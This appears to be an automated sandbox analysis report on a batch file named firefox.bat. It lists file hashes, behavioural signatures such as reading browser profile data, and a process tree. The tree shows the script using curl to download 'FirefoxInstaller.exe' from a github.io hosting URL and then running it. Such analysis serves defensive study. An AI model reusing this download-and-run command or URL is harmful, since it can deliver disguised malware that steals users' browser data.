Analysis

  • max time kernel
    92s
  • max time network
    138s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    20-11-2024 06:22

General

  • Target

    Files/Apps/firefox.bat

  • Size

    1KB

  • MD5

    51258a272fb1a43d19a099ae5a49b918

  • SHA1

    88c3eb4a5cff1a2a97fa247a6a45a47e6803618e

  • SHA256

    dc6c130992a0b42cd6aec0b0ddcd84ef6f4d757c5d2b871f7cca4a641d2240e0

  • SHA512

    b67c94e8ac494301413cd7109b80e55bef97f2c5fb2b969bfc04a7a25b22bf8150d8c245688320bb1a62f8f6c8beb749b3c83a769fb06a59897fe8015c4d4009

Malware Config

Signatures

  • Downloads MZ/PE file
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 7 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Program Files directory 6 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Files\Apps\firefox.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2224
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ver
      2⤵
        PID:2644
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c chcp
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2836
        • C:\Windows\system32\chcp.com
          chcp
          3⤵
            PID:1932
        • C:\Windows\system32\chcp.com
          chcp 65001
          2⤵
            PID:2904
          • C:\Windows\system32\chcp.com
            chcp 437
            2⤵
              PID:1088
            • C:\Windows\system32\curl.exe
              curl --help
              2⤵
                PID:4676
              • C:\Windows\system32\curl.exe
                curl -o FirefoxInstaller.exe "https://schooicodes.github.io/file_hosting/FirefoxInstaller.exe"
                2⤵
                  PID:5052
                • C:\Users\Admin\AppData\Local\Temp\Files\Apps\FirefoxInstaller.exe
                  FirefoxInstaller.exe
                  2⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:3928
                  • C:\Users\Admin\AppData\Local\Temp\7zS85F905B7\setup-stub.exe
                    .\setup-stub.exe
                    3⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Drops file in Program Files directory
                    • System Location Discovery: System Language Discovery
                    • Suspicious use of FindShellTrayWindow
                    • Suspicious use of SetWindowsHookEx
                    PID:2272
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 2272 -s 2624
                      4⤵
                      • Program crash
                      PID:1532
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 2272 -ip 2272
                1⤵
                  PID:1856

                Network

                MITRE ATT&CK Enterprise v15

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • C:\Users\Admin\AppData\Local\Temp\7zS85F905B7\setup-stub.exe

                  Filesize

                  550KB

                  MD5

                  6fd2e345d1daea0cad13d701d3063419

                  SHA1

                  805b2129b84df93ff301a5be8054fa12d5eb1792

                  SHA256

                  00518968d5ac7f86c00aaaa0a747cfe57a6f1cde435ce1d715e46d29ba5dbe75

                  SHA512

                  79ea114e72a4fc52c17e7574ed47847e0c03ca77e67dc71841ceb276655fcc9f8dff915beb2a58386256c19b92671a512dd138f5ab54147fe79eb850d57abcd3

                • C:\Users\Admin\AppData\Local\Temp\Files\Apps\FirefoxInstaller.exe

                  Filesize

                  341KB

                  MD5

                  2807af70411ea6fa907b4f30c70c6b8e

                  SHA1

                  0c26d3a3c7743a5a91d636e51c7dd3546333ea00

                  SHA256

                  8524a4a88d1c8899792a4712a385d8acb91ef69fbf9fb07ad40210d83d92556e

                  SHA512

                  17209b4ff8b9e0767deecf1b607fcf8569e3eea79861e76d5275cbf543254013af2cc624ea5dfb9b94333339fa589fd7e09c41e4dd5fb9d58334bf9a30e6a37c

                • C:\Users\Admin\AppData\Local\Temp\nsaA161.tmp\CityHash.dll

                  Filesize

                  53KB

                  MD5

                  2021acc65fa998daa98131e20c4605be

                  SHA1

                  2e8407cfe3b1a9d839ea391cfc423e8df8d8a390

                  SHA256

                  c299a0a71bf57eb241868158b4fcfe839d15d5ba607e1bdc5499fdf67b334a14

                  SHA512

                  cb96d3547bab778cbe94076be6765ed2ae07e183e4888d6c380f240b8c6708662a3b2b6b2294e38c48bc91bf2cc5fc7cfcd3afe63775151ba2fe34b06ce38948

                • C:\Users\Admin\AppData\Local\Temp\nsaA161.tmp\InetBgDL.dll

                  Filesize

                  17KB

                  MD5

                  97c607f5d0add72295f8d0f27b448037

                  SHA1

                  dfb9a1aa1d3b1f7821152afaac149cad38c8ce3c

                  SHA256

                  dc98ed352476af459c91100b8c29073988da19d3adc73e2c2086d25f238544a5

                  SHA512

                  ad759062152869089558389c741876029198c5b98fa725e2d2927866dc8b416ae2de871cb2479f614f6d29b6f646bf7191d02837c3cabc15b8185b563bc46268

                • C:\Users\Admin\AppData\Local\Temp\nsaA161.tmp\System.dll

                  Filesize

                  22KB

                  MD5

                  b361682fa5e6a1906e754cfa08aa8d90

                  SHA1

                  c6701aee0c866565de1b7c1f81fd88da56b395d3

                  SHA256

                  b711c4f17690421c9dc8ddb9ed5a9ddc539b3a28f11e19c851e25dcfc7701c04

                  SHA512

                  2778f91c9bcf83277d26c71118a1ccb0fb3ce50e89729f14f4915bc65dd48503a77b1e5118ce774dea72f5ce3cc8681eb9ca3c55cf90e9f61a177101ba192ae9

                • C:\Users\Admin\AppData\Local\Temp\nsaA161.tmp\UAC.dll

                  Filesize

                  28KB

                  MD5

                  d23b256e9c12fe37d984bae5017c5f8c

                  SHA1

                  fd698b58a563816b2260bbc50d7f864b33523121

                  SHA256

                  ec6a56d981892bf251df1439bea425a5f6c7e1c7312d44bedd5e2957f270338c

                  SHA512

                  13f284821324ffaeadafd3651f64d896186f47cf9a68735642cf37b37de777dba197067fbccd3a7411b5dc7976e510439253bd24c9be1d36c0a59d924c17ae8e

                • C:\Users\Admin\AppData\Local\Temp\nsaA161.tmp\UserInfo.dll

                  Filesize

                  14KB

                  MD5

                  610ad03dec634768cd91c7ed79672d67

                  SHA1

                  dc8099d476e2b324c09db95059ec5fd3febe1e1e

                  SHA256

                  c6c413108539f141bea3f679e0e2ef705898c51ec7c2607f478a865fc5e2e2df

                  SHA512

                  18c3c92be81aadfa73884fe3bdf1fce96ccfbd35057600ef52788a871de293b64f677351ba2885c6e9ce5c3890c22471c92832ffc13ba544e9d0b347c5d33bfd

                • C:\Users\Admin\AppData\Local\Temp\nsaA161.tmp\WebBrowser.dll

                  Filesize

                  103KB

                  MD5

                  b53cd4ad8562a11f3f7c7890a09df27a

                  SHA1

                  db66b94670d47c7ee436c2a5481110ed4f013a48

                  SHA256

                  281a0dc8b4f644334c2283897963b20df88fa9fd32acca98ed2856b23318e6ec

                  SHA512

                  bb45d93ed13df24a2056040c219cdf36ee44c8cddb7e178fdaabcec63ac965e07f679ca1fa42591bba571992af619aa1dc76e819a7901709df79598a2b0cef81

                • C:\Users\Admin\AppData\Local\Temp\nsaA161.tmp\installing.html

                  Filesize

                  1KB

                  MD5

                  167904d9f340244fbb3a303f50e7dd04

                  SHA1

                  cd9d3708e321c33713f2e6982b81f4e3a65b6bfd

                  SHA256

                  4d1f52b24e1e460e3b2aef617b3a68b4aad062c016cb5d6fbd9660813f3fca91

                  SHA512

                  b5b436bbdb972ec0da20cdc70706825a497f0da1df1ccf05decfdb0b931571d1db2fad955b07e0c592ac0e8ec7794563442d8f22b7a98cc7f86da64229b136d9

                • C:\Users\Admin\AppData\Local\Temp\nsaA161.tmp\installing.js

                  Filesize

                  2KB

                  MD5

                  5d880454577d033215b9153e956ff37b

                  SHA1

                  d609bfabf790817e2624e538c1ccae8143731ec7

                  SHA256

                  254bd34973522c900b2c480186dd26d8885f448023dfba244af88726998c36c6

                  SHA512

                  13b27295b9707b9f0d9f41be3af67dd49b7bcf79b3e58b065e6bc55f7eb59f9c8f79fff2126355748c14a16a9f1a884c2040bb196630e39cb51f9b4d1642ffe3

                • C:\Users\Admin\AppData\Local\Temp\nsaA161.tmp\stub_common.js

                  Filesize

                  815B

                  MD5

                  efce3dce0165b3f6551db47e5c0ac8d6

                  SHA1

                  1e15f6bb688e3d645092c1aa5ee3136f8de65312

                  SHA256

                  dab39cbae31848cce0b5c43fddd2674fef4dea5b7a3dacdaabdc78a8a931817e

                  SHA512

                  cec12da07f52822aaed340b1b751153efa43e5c3d747fa39f03bb2800bf53e9416020d654a818a6088acb2cf5581714433d818537f04af150e6bfb6861c03988

                • memory/3928-3-0x0000000000400000-0x0000000000446000-memory.dmp

                  Filesize

                  280KB

                • memory/3928-80-0x0000000000400000-0x0000000000446000-memory.dmp

                  Filesize

                  280KB